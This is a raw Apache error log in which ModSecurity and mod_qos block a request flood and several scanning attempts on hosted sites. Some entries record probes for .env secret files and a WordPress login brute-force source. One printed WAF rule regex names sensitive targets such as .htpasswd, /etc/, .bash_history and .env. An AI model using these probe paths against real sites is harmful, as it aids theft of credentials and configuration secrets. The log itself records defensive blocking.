[Tue May 26 19:54:24.360761 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K8AQAAALM"]
[Tue May 26 19:54:24.361183 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF0qK9k_ZUB2Vp25IMwAAAaI"]
[Tue May 26 19:54:24.361427 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K8BAAAAKU"]
[Tue May 26 19:54:24.367618 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPzAAAAAQ"]
[Tue May 26 19:54:24.371764 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K77gAAAMg"]
[Tue May 26 19:54:24.375863 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25ILAAAAe4"]
[Tue May 26 19:54:24.376153 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8RgAAAP0"]
[Tue May 26 19:54:24.379980 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IKQAAAaM"]
[Tue May 26 19:54:24.381984 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPyAAAAEc"]
[Tue May 26 19:54:24.401385 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8UAAAAJ0"]
[Tue May 26 19:54:24.402267 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8SAAAAOU"]
[Tue May 26 19:54:24.403850 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF0qK9k_ZUB2Vp25INwAAAfc"]
[Tue May 26 19:54:24.408434 2026] [security2:error] [pid 86490:tid 86701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8SwAAANY"]
[Tue May 26 19:54:24.419782 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8TwAAALc"]
[Tue May 26 19:54:24.439570 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8UQAAAPU"]
[Tue May 26 19:54:24.441130 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF0qK9k_ZUB2Vp25IOQAAAgw"]
[Tue May 26 19:54:24.446844 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8SQAAANQ"]
[Tue May 26 19:54:24.463587 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF2DRMqfxdEDkoszP5AAAACU"]
[Tue May 26 19:54:24.549964 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszQFAAAACc
[Tue May 26 19:54:24.553868 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K89AAAAJo
[Tue May 26 19:54:24.555230 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K89QAAALk
[Tue May 26 19:54:24.564485 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K89wAAAMs
[Tue May 26 19:54:24.566136 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGEqK9k_ZUB2Vp25IVgAAAdE
[Tue May 26 19:54:24.580604 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8-AAAANQ
[Tue May 26 19:54:24.590446 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8-gAAAJ4
[Tue May 26 19:54:24.596845 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8-wAAANA
[Tue May 26 19:54:24.605451 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszQFQAAAB4
[Tue May 26 19:54:24.610281 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stats/.env"] [unique_id "ahWtGFZMwN0DpLVWo6K8_AAAAMI"]
[Tue May 26 19:54:24.627405 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8_QAAAMc
[Tue May 26 19:54:24.705337 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8_gAAAKc
[Tue May 26 19:54:24.707765 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszQFgAAAHo
[Tue May 26 19:54:24.709434 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8_wAAAJo
[Tue May 26 19:54:24.716228 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9AQAAAMs
[Tue May 26 19:54:24.721262 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9AgAAALI
[Tue May 26 19:54:24.731568 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9AwAAANQ
[Tue May 26 19:54:24.738104 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9BAAAAJ4
[Tue May 26 19:54:24.752234 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9BQAAANA
[Tue May 26 19:54:24.757181 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszQGAAAAGc
[Tue May 26 19:54:24.769863 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backendfinaltest/.env"] [unique_id "ahWtGFZMwN0DpLVWo6K9BgAAAMI"]
[Tue May 26 19:54:24.789695 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9CAAAAKc
[Tue May 26 19:54:24.855727 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9CQAAAJo
[Tue May 26 19:54:24.860753 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszQGQAAAHQ
[Tue May 26 19:54:24.861054 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9CgAAAMs
[Tue May 26 19:54:24.867930 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9CwAAALI
[Tue May 26 19:54:24.882845 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9DAAAANQ
[Tue May 26 19:54:24.883310 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9DQAAAJ4
[Tue May 26 19:54:24.887496 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K9DgAAANA
[Tue May 26 19:54:24.930027 2026] [security2:error] [pid 86490:tid 86734] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/reporting/.env"] [unique_id "ahWtGFZMwN0DpLVWo6K9DwAAAPc"]
[Tue May 26 19:54:25.140639 2026] [security2:error] [pid 86490:tid 86570] [remote 74.91.224.220:56724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtGFZMwN0DpLVWo6K9EAAA2E8"]
[Tue May 26 19:54:25.274164 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8YgAAAMk"]
[Tue May 26 19:54:25.283138 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8ZAAAAL4"]
[Tue May 26 19:54:25.299852 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8bgAAAIk"]
[Tue May 26 19:54:25.304313 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8WAAAAJE"]
[Tue May 26 19:54:25.309481 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8aAAAAJw"]
[Tue May 26 19:54:25.316645 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF2DRMqfxdEDkoszP4gAAAFU"]
[Tue May 26 19:54:25.318433 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF2DRMqfxdEDkoszP4wAAAEY"]
[Tue May 26 19:54:25.318965 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8agAAAOs"]
[Tue May 26 19:54:25.321527 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8YwAAAIU"]
[Tue May 26 19:54:25.328463 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8dwAAAKM"]
[Tue May 26 19:54:25.338152 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8uQAAAIw"]
[Tue May 26 19:54:25.338888 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8hAAAAM8"]
[Tue May 26 19:54:25.344251 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8fgAAAMo"]
[Tue May 26 19:54:25.344442 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF2DRMqfxdEDkoszP6QAAAD4"]
[Tue May 26 19:54:25.348225 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8tQAAAKI"]
[Tue May 26 19:54:25.352375 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8fAAAAK8"]
[Tue May 26 19:54:25.359862 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8cQAAAQQ"]
[Tue May 26 19:54:25.376304 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8gwAAAMQ"]
[Tue May 26 19:54:25.376820 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF0qK9k_ZUB2Vp25IOwAAAck"]
[Tue May 26 19:54:25.377903 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8twAAANE"]
[Tue May 26 19:54:25.378089 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF1ZMwN0DpLVWo6K8gQAAAOY"]
[Tue May 26 19:54:25.389052 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8wAAAAOM"]
[Tue May 26 19:54:25.392436 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQBQAAAA4"]
[Tue May 26 19:54:25.394633 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8yQAAAQI"]
[Tue May 26 19:54:25.410906 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25IRwAAAb4"]
[Tue May 26 19:54:25.411042 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8ygAAAJs"]
[Tue May 26 19:54:25.411602 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8uwAAAQA"]
[Tue May 26 19:54:25.412695 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8wwAAAIY"]
[Tue May 26 19:54:25.428570 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K84gAAAOg"]
[Tue May 26 19:54:25.433881 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K84QAAAPM"]
